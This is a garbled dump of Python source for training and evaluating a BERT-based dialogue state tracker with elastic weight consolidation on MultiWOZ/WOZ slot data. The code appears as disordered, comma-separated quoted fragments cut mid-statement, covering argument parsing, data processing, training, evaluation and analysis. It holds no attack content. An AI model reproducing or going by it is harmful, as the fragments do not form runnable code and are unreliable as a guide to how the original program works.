eval_examples, target_label_list, prev_label_list,", "torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn =", "for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text)", "to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for", "you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you", "'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot", "BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task to train:", "== '#': # ignore comments (starting with '#') continue lines.append(line) return lines class", "in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b: tokens_b = [x if x !=", "+ args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file =", "than this will be truncated, and sequences shorter \\n\" \"than this will be", "############################################################################### class InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self,", "seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if", "line[1]: turn index if accumulation: if prev_dialogue_index is None or prev_dialogue_index != line[0]:", "= 0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info", "prev_label # trained slots in previous tasks class InputFeatures(object): \"\"\"A single set of", "# remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn", "= acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id)", "for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids]))", "y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0", "help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect',", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids,", "fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer", "of the task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\",", "os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model that you have fine-tuned ptr_model =", "(args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) #", "= len(prev_label_list) def _hard_coding_label(label): return 'do not care' if label=='dontcare' else label def", "target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples =", "'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val", "% max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x if x !=", "features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors", "= model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot", "loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc,", "t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0", "in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done", "prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item())", "l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot", "get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in labels: label_tokens =", "an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to set", "= acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss,", "[] for key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value)", "ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False,", "global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu ==", "## Get slot-value embeddings label_token_ids, label_len = [], [] for labels in label_list:", "num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data =", "in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training and", "prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item()", "loss_ + args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot, _ = model(input_ids,", "= DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev =", "action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the", "\"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader", "dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l", "eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\", "args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list,", "features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx -", "n_gpu = 1 # Initializes the distributed backend which will take care of", "def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\" raise", "if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot)", "line[0] else: # The symbol '#' will be replaced with '[SEP]' after tokenization.", "dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss,", "args.patience <= epoch: if last_update + args.patience <= epoch: break ############################################################################### # Evaluation", "for key in del_list: del ptr_model[key] if n_gpu > 1: model = model.module", "else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances", "label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu,", "to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test set.\")", "% out_file_name) with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for key", "!= '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b = None if example.text_b:", "= os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \"", "logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids,", "be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22,", "all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0,", "value labels of Previous task target_label_list = processor.get_labels() # Slot value labels of", "= False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps", "if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'),", "_ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _", "_post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot", "%s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot)))", "tokenization. text_a = line[2] + \" # \" + text_a text_b = line[3]", "in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in", "if label[0] == -1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]',", "prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None:", "all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data,", "example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" %", "uses lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not", "#if epoch > 100 and last_update + args.patience <= epoch: if last_update +", "Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch >", "i, _label in enumerate(labels)} for labels in label_list] for i, label in enumerate(label):", "rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup'", "should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args,", "action='store_true', help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this", "model.half() # Load pretrained model # in the case that slot and values", "############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value", "an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\",", "= {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx,", "\"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT model\")", "use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to", "in enumerate(examples): tokens_a = [x if x != '#' else '[SEP]' for x", "+ 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. input_ids", "parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of", "prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item() * num_valid_turn dev_acc", "(prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]", "for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s", "= Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task target_label_list", ") total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" %", "in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\"", "or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"]", "no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p in param_optimizer if", "text_a = line[2] + \" # \" + text_a text_b = line[3] +", "n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or", "* num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l *", "- 3) else: # Account for [CLS] and [SEP] with \"- 2\" if", "lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer", "Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device),", "if example.text_b: tokens_b = [x if x != '#' else '[SEP]' for x", "device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count()", "task target_label_list = processor.get_labels() # Slot value labels of Present task label_list =", "class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if", "global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1", "_ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot, _", "slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples(", "curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if", "+= input_ids.size(0) nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps == 0:", "https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0)", "+ '\\t' for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\"", "== -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task name should include at least", "for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu", "= [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir,", "curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length", "= processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in", "file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def", "or ('value_lookup' in key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in", "== 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer", "sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None", "%s\", key, str(result[key])) writer.write(\"%s = %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO", "= None best_loss = None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader,", "import collections import operator from tqdm import tqdm, trange import numpy as np", "= open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close()", "prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean()", "value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc):", "all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch", "prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu ==", "DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in label_list] incorrect_dialogs", "if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss,", "parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\",", "from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn seaborn.set_context(context=\"talk\")", "+ ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False):", "_get_label(label, label_list): label_id = [] label_info = '' label_map = [{_label: i for", "2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the", "\"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory", "] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters =", "help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name", "slot_idx.items(): if key == config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot =", "type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\"", "for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy':", "or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained", "length. input_ids += [0] * (max_seq_length - len(input_ids)) # Note: padding idx =", "_read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8')", "\"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base", "\" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False", "type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT", "0).item() dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn =", "== 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss", "Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data =", "model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task to train: bert,", "-1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y, ax): seaborn.heatmap(data, xticklabels=x,", "'do not care' if label=='dontcare' else label def _get_label(label, label_list): label_id = []", "hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number", "help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on the test", "parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc *", "features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length,", "train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running training *****\") logger.info(\" Num examples", "args.do_eval and not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must", "= %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) )", "= int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed manually for reproducibility. random.seed(args.seed)", "for vid, value in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value", "input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len", "in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value,", "best_loss = dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation", "batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list,", "*****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s =", "ptr_model[key] if n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state)", "tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b:", "parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to set the label encoder", "% (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args)", "\"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief", "[p for n, p in param_optimizer if not any(nd in n for nd", "if (step + 1) % args.gradient_accumulation_steps == 0: # modify learning rate with", "data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy =", "prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val in total_acc_slot])", "= prev_label_id # trained slots in previous tasks class DataProcessor(object): \"\"\"Base class for", "try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install", "if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def", "import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import", "* nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\", "= 0 for vid, value in enumerate(slot): if not value == 0: class_acc", "accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation)", "default=4, help=\"the number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run", "eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss,", "-1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] =", "and not args.do_eval and not args.do_analyze: raise ValueError(\"At least one of `do_train` or", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model)", "set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of labels for this data", "global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace('", "rate with special warm up BERT uses lr_this_step = args.learning_rate * warmup_linear(global_step /", "len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out,", "_truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS] and [SEP] with", "number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs", "analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\",", "> max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] +", "prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc,", "input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break text", "functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs == labels)", "0.01, 'lr': args.learning_rate}, {'params': [p for n, p in param_optimizer if any(nd in", "[InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert", "model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot =", "prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task target_label_list = processor.get_labels()", "Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer", "\"\"\"Loads a data file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim", "example.text_b: tokens_b = [x if x != '#' else '[SEP]' for x in", "input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids =", "line[0]: dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index is None or", "_get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example", "== max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len", "turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ## Other parameters", "args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At least one of `do_train`", "to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit", "len(tokens_b) if total_length <= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop()", "you want to set the label encoder trainable. \\n\" \"This option is valid", "writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\"", "for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p", "int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ##", "\"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for", "* args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len,", "with open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()):", "16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1:", "default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to", "prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for step,", "ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model) 